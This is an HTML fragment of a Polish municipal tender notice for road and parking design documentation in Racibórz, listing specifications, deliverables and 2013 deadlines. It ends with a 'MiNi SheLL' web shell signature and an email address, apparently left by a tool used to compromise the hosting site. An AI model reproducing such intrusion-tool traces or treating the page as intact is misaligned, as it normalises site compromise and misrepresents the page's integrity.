3). zalecana szerokość jezdni  3,50 m,
b). zakres inwestycji:
1). zalecana konstrukcja nawierzchni jezdni - ruch kategorii KR1 (warstwa ścieralna z betonu asfaltowego - 4cm,  warstwa wiążąca z betonu asfaltowego - 5 cm, podbudowa z tłucznia kamiennego 20 cm );
2). w pasie drogowym brak kanalizacji deszczowej dlatego w ramach zadania  należy przewidzieć wykonanie odwodnienia drogi.

c). Zakres opracowania:
1). projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
2). projekt zagospodarowania terenu
3). kosztorys inwestorski wraz z przedmiarem robót,
4). projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych,
5). specyfikacje techniczne wykonania i odbioru robót,
6). wymagane uzgodnienia.
7). opcja aktualizacji kosztorysu inwestorskiego
8). opcja pełnienia nadzoru inwestorskiego
d). Inne istotne informacje:
Dokumentacja winna być opracowana: 
-  6 egz. Projektu i specyfikacji technicznej wykonania i odbioru robót w formie
     papierowej,
-  3 egz. przedmiarów i kosztorysów inwestorskich,
-  2 egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Opracowanie dokumentacji projektowo-kosztorysowej na przebudowę ulicy Górnej (I etap) w Raciborzu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi obejmującej opracowanie dokumentacji projektowej, służącej do opisu przedmiotu zamówienia na wykonanie robót budowlanych, dla których nie jest wymagane uzyskanie pozwolenia na budowę zgodnie z Rozporządzeniem Min. Infrastruktury z dn. 2.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej.
Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a).  podstawowe dane techniczne
1). długość odcinka drogi (od ul. Jana Pawła II do posesji nr 31) -  310 m, w tym odcinek wymagający remontu nawierzchni - 60 m, odcinek wymagający przebudowy - 250 m,
2). szerokość pasa drogowego zmienna: od 7,50 m (na wysokości posesji  nr 1b÷25) do 6,00 (na wysokości posesji nr 25÷31), 
3). szerokość jezdni (część remontowana) 5,00 m,
4). zalecana szerokość jezdni (część przebudowywana) 4,50 m,
5). szerokość chodnika (prawostronny) 1,5 m
6). powierzchnia jezdni 1425 m2,
7). powierzchnia chodników i zjazdów 465 m2
b). zakres inwestycji:
1). roboty rozbiórkowe elementów istniejącej jezdni i chodników m.in. rozbiórka istniejącej nawierzchni asfaltowej na płytach żelbetowych, rozbiórka płyt żelbetowych drogowych, rozbiórka płyt betonowych chodnikowych i trylinki, rozbiórka krawężników  i obrzeży betonowych,
2). zalecana konstrukcja nawierzchni jezdni - ruch kategorii KR2  (warstwa ścieralna z betonu asfaltowego - 5cm,  podbudowa zasadnicza z betonu asfaltowego - 7 cm, podbudowa z tłucznia kamiennego 20 cm );
3). zalecana konstrukcja chodnika (warstwa ścieralna z kostki betonowej szarej - 8 cm, podsypka cementowo - piaskowa - 4 cm podbudowa zasadnicza  z tłucznia kamiennego -  15 cm) ; 
4). zalecana konstrukcja zjazdów (warstwa ścieralna z kostki betonowej czerwonej - 8 cm, podsypka cementowo - piaskowa - 4 cm podbudowa zasadnicza z tłucznia kamiennego-  20 cm).
c). zakres opracowania:
1). projekt wykonawczy na aktualnych mapach sytuacyjno-wysokościowych,
2). kosztorys inwestorski wraz z przedmiarem robót,
3). projekt organizacji ruchu: docelowy i na czas prowadzenia robót drogowych
4). specyfikacje techniczne wykonania i odbioru robót,
5). wymagane uzgodnienia.
6). opcja aktualizacji kosztorysu inwestorskiego i nadzoru inwestorskiego

d). Inne istotne informacje:
Dokumentacja winna być opracowana: 
-  6 egz. projektu oraz specyfikacji wykonania i odbioru robót w formie papierowej,
-  3 egz. przedmiarów i kosztorysów inwestorskich,
-  2 egz. kompletu dokumentacji projektowej w formie elektronicznej w formacie pdf.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Opracowanie dokumentacji projektowo-kosztorysowej  miejsc postojowych na ul. Książęcej w Raciborzu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usługi obejmującej opracowanie dokumentacji projektowej, służącej do opisu przedmiotu zamówienia na wykonanie robót budowlanych, dla których nie jest wymagane uzyskanie pozwolenia na budowę zgodnie z Rozporządzeniem Min. Infrastruktury z dn. 2.09.2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej.
Warunki do opracowania dokumentacji projektowo - kosztorysowej:
a). podstawowe dane techniczne: 
1). długość odcinka drogi ul. Książęcej, na którym planuje się wykonanie miejsc    
  postojowych - 86 mb (od posesji nr 11 do zakończenia przy ul. Siwonia);
2). szerokość istniejącej jezdni około 5,6 - 6,0 m - jezdnia dwukierunkowa;
3). szerokość pasa drogowego (działka nr 565/2) około 11 m;  
4).  ilość miejsc postojowych minimum 15;
5). Projektant winien przedstawić 3 propozycje rozwiązań konfiguracji miejsc postojowych.

b). zakres inwestycji:
1). Roboty rozbiórkowe elementów istniejącej jezdni m.in.: rozbiórka krawężników;
2). Zalecana konstrukcja nawierzchni miejsc postojowych - warstwa ścieralna z kostki betonowej szarej o gr. 8 cm, podsypka cementowo - piaskowa - 4 cm, podbudowa  zasadnicza z tłucznia kamiennego - 20 cm; 
3). Istnieje możliwość pozyskania części działki nr 741/2 bezpośrednio przyległej do pasa drogowego - należącej do SM Nowoczesna;
4). W przypadku gdy przyjęte rozwiązania lokalizacyjne będą wymuszać konieczność wycinki drzew projektant uzyska wymagane zgody;

c). zakres opracowania:
1). Opracowanie mapy do celów projektowych;
2). Wykonanie minimum 3 wariantów rozmieszczenia miejsc postojowych, 
3).Uzyskanie wszystkich wymaganych uzgodnień (w tym decyzji dotyczącej ewentualnej wycinki drzew i przełożenia sieci energetycznej);
4). Opracowanie projektów budowlano - wykonawczych;
5). Uzyskanie zezwoleń na prowadzenie prac (pozwolenie lub zgłoszenie);
6). Opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;
7). Opracowaniu projektów organizacji ruchu;
8). Opracowaniu specyfikacji technicznych wykonania i odbioru robót

d). Inne istotne informacje:
Dokumentacja winna być opracowana w ilości:
- 4 egzemplarze Projektów budowlano - wykonawczych wraz z zagospodarowaniem  terenu oraz specyfikacji wykonania i odbioru robót w formie papierowej;
-  2 egzemplarze przedmiarów i kosztorysów inwestorskich;
- 1 egzemplarz kompletu dokumentacji projektowej w formie elektronicznej 
     w formacie pdf.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com